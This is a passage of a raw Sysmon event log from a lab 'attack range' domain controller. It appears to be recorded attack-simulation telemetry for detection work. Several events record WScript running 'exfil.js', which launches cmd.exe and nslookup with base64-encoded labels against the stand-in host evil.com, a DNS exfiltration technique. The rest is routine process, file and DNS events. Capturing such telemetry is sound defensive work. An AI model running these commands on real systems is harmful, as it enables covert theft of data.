14:16:11.443{2E1864BB-17AB-629A-513E-000000005F02}39565088C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-533E-000000005F02}7764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.449{2E1864BB-17AB-629A-533E-000000005F02}7764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-513E-000000005F02}3956C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlegf.tmp 2>&1 10341000x8000000000000000195554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.411{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-523E-000000005F02}7632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.411{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-523E-000000005F02}7632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.411{2E1864BB-17AB-629A-523E-000000005F02}76321300C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-513E-000000005F02}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.389{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-523E-000000005F02}7632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-513E-000000005F02}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.374{2E1864BB-17A1-629A-783D-000000005F02}55522820C:\Windows\System32\WScript.exe{2E1864BB-17AB-629A-513E-000000005F02}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.380{2E1864BB-17AB-629A-513E-000000005F02}3956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlegf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.358{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbbb.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.358{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\glean\db\data.safe.binMD5=134BBA83E476535F9D367869F1CA2938,SHA256=A2EC6528296FDE3BDAB95BBD9B38693DBAB13F1E0FD7279DF91380AF4FF3C22D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.311{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5985E91CC3B8BFE051F886221969D9A,SHA256=B7545FFA12030D899009EF876445B1D7828A0548F0790E19FA5A0F55299FB801,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.311{2E1864BB-17AB-629A-4F3E-000000005F02}60165920C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-503E-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.309{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.309{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.308{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.307{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-503E-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.307{2E1864BB-17AB-629A-4E3E-000000005F02}81003916C:\Windows\system32\cmd.exe{2E1864BB-17AB-629A-503E-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.307{2E1864BB-17AB-629A-503E-000000005F02}3300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AB-629A-4E3E-000000005F02}8100C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnbbb.tmp 2>&1 10341000x8000000000000000195532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.289{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-4F3E-000000005F02}6016C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.274{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AB-629A-4F3E-000000005F02}6016C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.274{2E1864BB-17AB-629A-4F3E-000000005F02}60165920C:\Windows\system32\conhost.exe{2E1864BB-17AB-629A-4E3E-000000005F02}8100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.243{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AB-629A-4F3E-000000005F02}6016C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000195528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52227- 354300x8000000000000000195527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.533{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52226- 354300x8000000000000000195526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.532{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52225- 354300x8000000000000000195525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.532{00000000-0000-0000-0000-000000000000}1788<unknown process>-udptruefalse127.0.0.1-52225-false127.0.0.1-53domain 354300x8000000000000000195524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.431{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52224- 354300x8000000000000000195523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.431{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52223- 354300x8000000000000000195522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.431{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52222- 354300x8000000000000000195521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.431{00000000-0000-0000-0000-000000000000}2600<unknown process>-udptruefalse127.0.0.1-52222-false127.0.0.1-53domain 354300x8000000000000000195520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52221- 354300x8000000000000000195519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52220- 354300x8000000000000000195518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.350{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52219- 354300x8000000000000000195517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.350{00000000-0000-0000-0000-000000000000}3732<unknown process>-udptruefalse127.0.0.1-52219-false127.0.0.1-53domain 354300x8000000000000000195516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.228{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52218- 354300x8000000000000000195515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.227{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52217- 354300x8000000000000000195514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.227{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52216- 354300x8000000000000000195513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.227{00000000-0000-0000-0000-000000000000}7804<unknown process>-udptruefalse127.0.0.1-52216-false127.0.0.1-53domain 354300x8000000000000000195512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52215- 354300x8000000000000000195511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.087{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 